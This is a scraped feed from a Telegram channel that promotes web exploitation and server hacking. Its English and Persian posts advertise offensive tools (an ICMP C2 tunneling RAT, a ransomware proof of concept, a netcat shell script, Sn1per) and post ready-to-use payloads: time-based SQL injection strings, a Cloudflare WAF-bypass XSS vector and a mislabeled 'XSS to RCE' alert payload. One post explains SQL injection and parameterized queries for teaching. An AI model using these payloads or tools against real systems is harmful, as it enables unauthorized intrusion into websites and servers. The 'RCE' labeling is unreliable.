0Day.Today | Learn Exploit | Zero World | Dark web |
18.8K subscribers
1.23K photos
123 videos
487 files
1.27K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
PingRAT - PingRAT secretly passes C2 traffic through firewalls using ICMP payloads

Github

#red_team #firewall_bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥3
Phirautee - A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares

Github

#ransomware #pentest
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥2👍2
0Day.Today | Learn Exploit | Zero World | Dark web |
♨️ چالش SQLi تمام شد. ❗️چند مورد از Query های زیر دارای آسیب پذیری SQLi نمی باشند. 💬گزینه هارو همراه با ذکر علت بفرمایید. 🔶برای 3 نفر که پاسخ صحیح رو داده باشند یک اکانت unlimit vpn یک ماهه داده میشه. توی کامنتا عدد مد نظر + علت رو بفرمایید. برا مثال…
♨️ جواب چالش :
💠 موارد 1 تا 4 دارای آسیب پذیری SQLi هستند. چرا ؟
ببینید دوستان یک ورودی ساده مثل '; SELECT 1=1; -- رو در نظر بگیرید
حالا بیایید توی چهار مورد اول جای USERNAME جایگذاری کنیم :

⚠️ نتیجه بعد از اجرا شدن
1. cursor.execute("SELECT id FROM users WHERE username = '" '; SELECT 1=1; -- "'"); 
2. cursor.execute("SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
3. cursor.execute("SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
4. cursor.execute(f"SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");


توی تمامی این چهار مورد یک تک کوتیشن اضافه میمونه که باعث ایجاد اررور میشه و در نتیجه Query دارای آسیب پذیری SQLi هستش.
علت اینکه این 4 مورد دارای آسیب پذیری هست اینکه برنامه نویس ورودی رو خودش به صورت دستی داره میسازه و خبری از پارامتریزه نیست.
اما تو دو مورد 5 و 6 این موارد رو تست کنیم :
نتیجه بعد از اجرا شدن
5. cursor.execute("SELECT id FROM users WHERE username = True");
6. cursor.execute("SELECT id FROM users WHERE username = True");


در این قسمت برنامه نویس با استفاده از آرگومان دوم اومده ورودی رو پارامتریزه کرده یعنی ورودی ابتدا وارد تابع mogrify() میشه و سپس وارد تابع _scape_args() میشه که باعث میشه Query پارامتریزه بشه.
اگه میخواهید در مورد این دو تابع اطلاعات بیشتری پیدا کنید :
🌐 GitHub

برندگان چالش بر حسب میزان صحت پاسخ :
1. @Alirezkarimii
2. @arab1334
3. @xkdlee

دوستان جهت دریافت جایزه به آیدی @IRDefacer پیام بدن.
🔥5👍4
🎸 Thank you for your support 🎸


🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
7🔥5👍1
Shell(@LearnExploit).py
1.2 KB
دسترسی شل با Netcat ⚡️

#netcat #shell

KhodeEhsan

——————
0Day.Today
@LearnExploit
@Tech_Army
411🤬1
🌟 Happy Mother's Day to all Muslims in the world 🌟
Please open Telegram to view this post
VIEW IN TELEGRAM
24👍4🤬3👎1
Time sleep sql injection ⚡️

Payload:
'XOR(if(now()=sysdate(),sleep(33),0))OR'

#sql #sql_injection #payload
——————
0Day.Today
@LearnExploit
@Tech_Army
6
Cloudflare WAF Bypass ⚡️

<a"/onclick=(confirm)(origin)>Click Here!

#Xss #waf #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
4
want a Tutorial ?😀
reaction : 50+
87🔥16❤‍🔥12👍3👎2
🤫⚡️
——————
0Day.Today
@LearnExploit
@Tech_Army
8👍3👎2❤‍🔥1
reflected XSS to RCE

Payload: "><img src=x onerror=alert(whoami)>

#Xss #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
👎9😁51👍1
sql injection payload

14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515

#sql #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
3
🔫 Sn1per 🔫
Attack Surface Management Platform

Discover hidden assets and vulnerabilities in your environment

📊 The ultimate pentesting toolkit
Integrate with the leading commercial and open source vulnerability scanners to scan for the latest CVEs and vulnerabilities.

👁‍🗨 Find what you can't see
Hacking is a problem that's only getting worse. But, with Sn1per, you can find what you can’t see—hidden assets and vulnerabilities in your environment.

🔔 Discover and prioritize risks in your organization
Sn1per is a next-generation information gathering tool that provides automated, deep, and continuous security for organizations of all sizes.

📱 Install:
cd Sn1per
bash install.sh


😸 Github

⬇️ Download
🔒 BugCod3

#Cybersecurity #Pentesting #Sn1per

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤‍🔥3